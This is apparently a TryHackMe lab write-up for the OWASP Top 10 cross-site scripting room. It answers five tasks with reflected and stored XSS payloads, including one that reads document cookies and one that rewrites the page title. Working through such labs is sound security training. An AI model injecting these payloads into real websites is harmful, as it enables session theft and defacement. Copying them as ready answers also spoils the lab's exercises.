TryHackMe: OWASP Top 10 || Severity 7 || Cross-Site Scripting

#1 Navigate to http://10.10.227.118/ in your browser and click on the “Reflected XSS” tab on the navbar; craft a reflected XSS payload that will cause a popup saying “Hello”.

<script>alert("Hello")</script>

#2 On the same reflective page, craft a reflected XSS payload that will cause a popup with your machines IP address.

<script>alert(window.location.host)</script>

#3 Now navigate to http://10.10.227.118/ in your browser and click on the “Stored XSS” tab on the navbar; make an account. Then add a comment and see if you can insert some of your own HTML.

<a href=”www.google.com”> Click on this link </a>

#4 On the same page, create an alert popup box appear on the page with your document cookies.

<script>alert(document.cookie)</script>

#5 Change “XSS Playground” to “I am a hacker” by adding a comment and using Javascript.

<script>document.querySelector('#thm-title').textContent='I am a hacker'</script>